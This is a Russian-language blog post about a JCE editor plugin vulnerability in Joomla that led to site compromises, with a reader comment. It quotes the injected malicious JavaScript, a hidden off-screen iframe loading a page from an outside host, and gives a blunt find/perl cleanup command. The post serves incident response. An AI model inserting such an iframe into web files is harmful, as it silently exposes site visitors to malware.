Уязвимость Joomla с редактором JCE

В плагине редакторе JCE версии ниже 2.0.11 была обнаружена уязвимость и имеет место быть большая череда взломов с последующим внедрением вредоносного кода в js-файлы.
Тот случай, который был виден мной, состоял из следующего кода:

document.write(‘<iframe width=»55″ height=»55″ style=»width:100px;height:100px;position:absolute;left:-100px;top:0;» src=»http://cpjutiv.wikaba.com/0ca0885.tet?11″></iframe>’);

Можно попробовать выполнить следующую команду в корне директории сайта, однако она несколько грубоватая

find ./ -type f -name «*.js» -exec perl -pi -e ‘s/docume.*\)\;//g»’ ‘{}’ \;

и как обычно рекомендую перед этим сделать резервную копию сайта.

Другие публикации по теме:

Обновление Joomla 1.6 до Joomla 1.7 Раздел статьи "Быстрое обновление" подходит только для сайтов, которые уже обновлены до Joomla 1.6.5., если версия движка вашего сайта не 1.6.5, то ...
Семь шагов по улучшению безопасности ssh... Для повышения безопасности сервера при использовании ssh практикуют различные способы, предотвращающие деструктивные действия либо несанкционированный...
Основы оптимизации Joomla Как только вы освоите Joomla, один из неизменных вопросов, который будет вам докучать -  производительность. Почему? Ну.. В наши дни даже Goo...
Как переделать шаблон для Joomla 1.5 в шаблон для ... Требуется всего четыре действия:1. Заменить первые строки index.php (см. ниже) на строки из шаблона от joomla 1.0.

Поделиться информацией с друзьями!

Чтобы не пропустить обновления, подпишись на RSS или почтовую рассылку (свой выбор сделали уже 128 человек!)

Один комментарий к «Уязвимость Joomla с редактором JCE»

  1. Блин я в то же дерьмо вляпался.. Спасибо, сейчас хоть немного прояснилось.

Оставить комментарий